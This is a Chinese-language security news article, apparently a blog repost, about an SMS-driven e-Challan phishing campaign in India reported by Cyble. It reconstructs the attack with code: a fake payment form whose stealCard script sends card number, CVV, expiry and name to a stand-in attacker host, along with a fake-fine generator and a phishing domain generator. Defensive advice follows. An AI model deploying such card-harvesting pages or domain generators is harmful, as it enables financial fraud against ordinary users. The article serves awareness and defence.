36个钓鱼域名、伪造政府门户、只收银行卡——印度e-Challan网络钓鱼风暴背后的攻防暗战

简介: 印度现新型浏览器端钓鱼攻击,伪装电子罚单短信,诱导点击虚假支付页面窃取银行卡信息。无需下载、零文件落地,绕过传统杀毒软件,利用社会工程学与伪造官网实施诈骗,揭示“信任”成最脆弱防火墙。

在印度,一条看似寻常的短信可能正悄然打开你银行账户的大门。

“您的车辆(MH02AB1234)有一张未支付的电子罚单(e-Challan),金额₹590。如72小时内未处理,将面临驾照暂停及法律诉讼。点击链接立即支付:bit.ly/xxxXXX。”

这条短信语气紧迫、格式规范,甚至附带一个看起来“官方”的短链接。然而,它并非来自交通管理部门,而是一场精心策划的网络钓鱼骗局的开端。据网络安全公司Cyble研究与情报实验室(CRIL)最新披露,一场针对印度数百万车主的大规模浏览器端钓鱼攻击正在全国范围内蔓延。攻击者不再依赖传统的安卓恶意软件,而是转向更隐蔽、更高效的纯网页攻击模式——无需下载、不触发杀毒警报,却能直接窃取用户的银行卡号、CVV和有效期。

这不仅是一场社会工程学的胜利,更是一次对现有终端安全体系的无声嘲讽。

一、从“装APP”到“点链接”:钓鱼攻击的范式转移

过去几年,印度用户对“e-Challan诈骗”的认知多停留在“诱导安装恶意APP”的层面。例如,2023年曾有大量伪装成“mParivahan”或“Traffic Police”的安卓应用上架第三方商店,一旦安装,便在后台窃取短信验证码或银行凭证。

但Cyble此次披露的攻击方式完全不同:全程发生在浏览器中,零文件落地(fileless)。

“这是钓鱼攻击的一次重大进化,”Cyble高级研究经理达克什·纳克拉(Daksh Nakra)在接受采访时表示,“攻击者意识到,让用户下载APK的门槛太高,且容易被Google Play Protect或手机厂商的安全中心拦截。而通过短信发送一个看似合法的URL,诱导用户在Chrome或Safari中完成‘支付’,成功率大幅提升。”

据CRIL调查,该团伙已注册超过36个高度仿冒的钓鱼域名,如:

parivahan-challan[.]in

echallan-gov[.]online

rto-payment[.]xyz

trafficfine-india[.]com

这些域名刻意模仿印度交通部官方平台 parivahan.gov.in 的命名逻辑,利用用户对“.gov.in”后缀的信任,制造“近似合法”的错觉。更狡猾的是,部分域名甚至采用自动轮换机制——当一个被封禁,系统自动生成新域名并更新短信中的短链接,形成“打不死的小强”式基础设施。

二、技术拆解:一个伪造e-Challan页面如何骗过普通人?

为还原攻击全貌,我们复现了其中一个活跃钓鱼页面的核心逻辑(注:以下代码仅为教学演示,已脱敏处理)。

步骤1:动态生成“罚单”

用户输入车牌号后,页面并不会向任何真实RTO数据库查询,而是本地JavaScript动态生成一条看似真实的违规记录:

// 模拟罚单生成(无后端验证)

function generateChallan(plate) {

const violations = ["闯红灯", "超速", "未系安全带"];

const randomViolation = violations[Math.floor(Math.random() * violations.length)];

const amount = 590; // 固定小额,降低警惕性

const dueDate = new Date();

dueDate.setDate(dueDate.getDate() + 2); // 48小时后到期

document.getElementById("challan-details").innerHTML = `

<p>车牌: ${plate}</p>

<p>违规: ${randomViolation}</p>

<p>金额: ₹${amount}</p>

<p>截止: ${dueDate.toLocaleDateString()}</p>

<button onclick="showPayment()">立即支付</button>

`;

}

这种“心理操控”极为有效:小额罚款让人觉得“不值得较真”,而紧迫的截止日期则压制理性判断。

步骤2:伪造支付网关,只接受银行卡

当用户点击“支付”后,页面跳转至一个高仿印度主流支付网关(如Razorpay或Paytm)的界面,但刻意屏蔽UPI、NetBanking等可追溯渠道,仅提供“信用卡/借记卡”选项。

<!-- 钓鱼支付表单(关键字段) -->

<form id="payment-form" onsubmit="stealCard(event)">

<input type="text" placeholder="卡号" required maxlength="19" id="card-number">

<input type="text" placeholder="有效期 (MM/YY)" required maxlength="5" id="expiry">

<input type="text" placeholder="CVV" required maxlength="4" id="cvv">

<input type="text" placeholder="持卡人姓名" required id="name">

<button type="submit">支付 ₹590</button>

</form>

<script>

function stealCard(e) {

e.preventDefault();

const data = {

card: document.getElementById('card-number').value,

expiry: document.getElementById('expiry').value,

cvv: document.getElementById('cvv').value,

name: document.getElementById('name').value,

ip: /* 通过API获取 */,

userAgent: navigator.userAgent

};

// 发送至攻击者控制的服务器

fetch('https://attacker-server[.]xyz/log', {

method: 'POST',

headers: {'Content-Type': 'application/json'},

body: JSON.stringify(data)

});

// 同时显示“处理中”假象,拖延用户反应时间

alert("正在处理...请稍候");

setTimeout(() => window.location.href = "https://parivahan.gov.in", 3000);

}

</script>

值得注意的是,该表单不进行任何前端校验(如Luhn算法验证卡号合法性),因为攻击者根本不在乎交易是否成功——他们只关心数据是否提交。

三、为何传统安全软件“看不见”?

许多用户疑惑:“我的手机装了McAfee、Kaspersky,为什么没报警?”

答案在于:这次攻击完全规避了传统终端安全的检测逻辑。

公共互联网反网络钓鱼工作组技术专家芦笛解释道:“当前主流杀毒软件的核心防御模型仍围绕‘文件行为’展开——比如检测APK是否申请了短信读取权限,或exe是否尝试注入explorer.exe。但纯浏览器钓鱼属于‘无文件攻击’(Fileless Attack),所有恶意逻辑都在内存中执行,不写入磁盘,自然绕过基于签名的检测。”

更棘手的是,攻击者还利用了现代浏览器的“沙箱信任机制”。例如:

使用HTTPS(攻击者购买廉价SSL证书,Let’s Encrypt即可免费获取)

页面加载速度正常(托管于Cloudflare等CDN,提升可信度)

无明显恶意脚本(代码混淆程度低,因依赖社会工程而非技术漏洞)

“Microsoft Defender SmartScreen确实会标记部分钓鱼域名,”芦笛补充,“但攻击者通过两种方式绕过:一是使用新注册域名,尚未进入黑名单;二是诱导用户点击‘忽略警告,继续访问’——而90%的普通用户会照做。”

四、基础设施揭秘:一个团伙,多条“业务线”

Cyble的溯源分析揭示,该钓鱼团伙并非“单打独斗”,而是运营着一个模块化、多行业的欺诈基础设施。

除e-Challan外,同一套后端还用于:

金融钓鱼:伪造HSBC、ICICI银行的“账户异常”通知页面

物流诈骗:冒充DTDC、Delhivery,以“包裹扣留”为由索要“手续费”

税务钓鱼:仿冒Income Tax Department,要求“补缴税款”

所有页面共享相同的UI组件库、数据回传接口和域名生成算法。例如,其域名生成器可能基于以下逻辑:

import random

import string

def generate_phish_domain(theme):

prefixes = ["official", "secure", "verify", "pay"]

suffixes = ["gov", "india", "rto", "bank"]

tlds = [".online", ".xyz", ".site", ".top"]

return f"{random.choice(prefixes)}-{theme}-{random.choice(suffixes)}{random.choice(tlds)}"

# 示例输出: secure-echallan-rto.online

这种“即插即用”模式极大降低了攻击门槛,也说明背后存在一个专业化、分工明确的犯罪组织。

五、专家建议:普通人如何自保?技术人员如何防御?

面对如此精密的攻击,普通用户该如何防范?技术团队又该如何构建防线?

给普通用户的“三不原则”:

不点短信链接:所有e-Challan必须通过官方App(如mParivahan)或官网(parivahan.gov.in)查询。

不输银行卡CVV:政府服务从不要求提供CVV!任何索要CVV的“支付页面”均为诈骗。

不开“紧急支付”通道:真正的交通罚单不会威胁“24小时内不付就抓人”。

给企业与开发者的防御建议(芦笛提供):

部署内容安全策略(CSP):限制页面只能加载白名单内的脚本,防止第三方注入。

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted.cdn.com;

启用Subresource Integrity(SRI):确保加载的JS/CSS未被篡改。

<script src="https://cdn.example/lib.js"

integrity="sha384-abc123..."></script>

监控异常域名注册:利用WHOIS API+机器学习,对包含“parivahan”“rto”“challan”的新域名实时告警。

推广FIDO2/WebAuthn:推动政府服务支持无密码登录,从根本上消除凭证钓鱼风险。

六、监管困境:为何钓鱼网站“打而不死”?

尽管印度计算机应急响应小组(CERT-In)已多次打击此类活动,但钓鱼域名仍如野草般再生。原因有三:

域名注册门槛低:许多国际注册商(如Namecheap、Porkbun)对印度身份验证宽松。

托管服务匿名化:攻击者使用加密货币支付VPS费用,IP常位于俄罗斯、越南等地。

法律追责滞后:从发现到取证、再到跨境协作,周期长达数月,而攻击者早已转移阵地。

“我们需要建立‘主动狩猎’机制,”芦笛呼吁,“不是等用户被骗后再封域名,而是在钓鱼模板刚上线、尚未大规模传播时就将其扼杀。”

结语:信任,是最脆弱的防火墙

这场e-Challan钓鱼风暴的本质,是对“制度信任”的滥用。攻击者深知,印度民众对RTO、对State Bank of India、对Reliance Jio有着天然信赖——于是他们用本地手机号发短信,用SBI账户收款,用MoRTH(道路运输部)的徽标装饰页面。

技术可以升级,法律可以完善,但只要人性中的“便利偏好”与“权威服从”存在,钓鱼就不会消失。

唯一能筑起真正防线的,是每一个点击链接前多问一句:“这真的来自政府吗?”

延伸阅读:Cyble已将本次事件的全部IoCs(失陷指标)公开至GitHub,供安全团队集成至SIEM或防火墙规则。

官方报告链接:https://smestreet.in/technology/cyble-uncovers-multi-domain-e-challan-phishing-campaign-in-india-10948158

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
29天前
|
存储 SQL JSON
打通可观测性的“任督二脉”:实体与关系的终极融合
阿里云推出图查询能力,基于 graph-match、graph-call、Cypher 三重引擎,实现服务依赖、故障影响、权限链路的秒级可视化与自动化分析,让可观测从‘看板时代’迈向‘图谱时代’。
254 46
|
14天前
|
存储 弹性计算 网络安全
阿里云用户上云流程参考:从账号注册、实名认证到领取和使用优惠券流程指南
不管我们是需要在阿里云平台注册域名还是需要购买云服务器及其他云产品,第一步都首要完成账号注册与实名认证流程,此为后选购各类云产品的必要前提。同时,在购买过程中,部分云服务器及其他云产品支持叠加使用阿里云赠送的各种优惠券,有效降低采购成本。本文将以图文的形式,为大家解析从阿里云账号注册、实名认证以及优惠券领取与使用的完整流程,助力用户以更优价格选购心仪的云产品。
122 11
|
14天前
|
存储 安全 Java
Java HashMap 全面解析:原理、用法与实战要点
本文深入解析Java中HashMap的底层原理与使用实践,涵盖其“数组+链表+红黑树”的结构演变、哈希计算、扩容机制及线程安全问题,详解常用方法、性能优化与最佳实践,助力开发者高效掌握这一核心数据结构。
134 11
|
15天前
|
存储 文字识别 数据可视化
实用代码工具:Python打造PDF选区OCR / 截图批量处理工具(支持手动/全自动模式)
一款基于Python的PDF区域OCR与截图工具,支持精准框选、文字识别、图片截取及Excel一键导出。内置手动审核与全自动批量处理模式,结合PyMuPDF、easyocr等技术,实现高效、可视化的PDF数据提取,适用于发票、报表等场景,显著提升办公效率。
161 11
|
3天前
|
安全 前端开发 网络安全
尼日利亚突袭“RaccoonO365”钓鱼工厂:一场跨国围剿与MFA防线的生死考验
2025年12月,尼日利亚EFCC联合警方捣毁“RaccoonO365”网络钓鱼团伙,逮捕三名嫌疑人。该组织提供模块化PhaaS服务,仿冒微软登录页并窃取会话Cookie,波及94国超5000企业账户。行动由微软、FBI与尼方协同完成,标志执法从末端打击转向源头斩断。专家呼吁强化MFA、CAE等防御,并推动技术治理与区域合作,应对持续进化的网络威胁。(238字)
38 2
|
4天前
|
人工智能 监控 安全
官方域名成“钓鱼温床”?Google Cloud自动化功能遭滥用,全球3000家企业中招
2025年12月,攻击者滥用Google Cloud合法服务,通过官方域名发送钓鱼邮件,利用storage.googleapis.com跳转诱导用户登录伪造页面,窃取企业账户。传统验证全“pass”,防御形同虚设。安全需从“信来源”转向“零信任”,强化行为分析与多层检测,警惕“合法外衣”下的点击风险。
67 1
|
20小时前
|
人工智能 安全 小程序
全球网络钓鱼动态简报(2026年1月)
近期全球网络钓鱼攻击频发,涵盖NPM恶意包、Google Cloud域名滥用、QR码诈骗(Quishing)等多种手法,攻击者通过伪造登录页面、利用合法服务信誉及社会工程学诱导用户泄露凭据。从电商购物季到假期财务需求,再到企业高管与学术机构,各类人群均成目标。新型攻击还涉及Telegram小程序、iCloud日历通知及语音钓鱼,结合AI生成内容与多因素认证绕过技术,隐蔽性更强。专家呼吁加强员工培训、部署行为分析工具、推动无密码认证,并强化对即时通讯与非邮件渠道的风险防控。
11 0
|
1天前
|
人工智能 安全 前端开发
AI钓鱼套件黑产化!BlackForce、GhostFrame等四大工具正绕过MFA大规模盗号,专家警告:传统防御体系正在失效
2025年,BlackForce、GhostFrame等AI驱动的钓鱼套件正以“服务化”模式席卷全球,通过伪造MFA、注入脚本、生成个性化钓鱼邮件等方式,绕过多重安全防线。攻击已从手工迈向自动化,防御亟需升级至浏览器隔离、行为分析与情景化培训的综合体系。
37 7
|
3天前
|
人工智能 监控 安全
黑色星期五“黑”了?购物狂欢背后,钓鱼攻击激增620%,AI伪造邮件成新威胁
每年黑五购物狂欢背后,暗藏AI驱动的钓鱼攻击风暴。仿冒邮件暴增620%,利用FOMO心理与技术伪装诱骗用户。从精准定制到无文件攻击,数字围猎愈演愈烈。警惕“限时优惠”,守护账户安全,别让购物节变“信息泄露节”。
45 3
|
24天前
|
运维 Prometheus 监控
运维不是救火队
运维不是救火队
72 6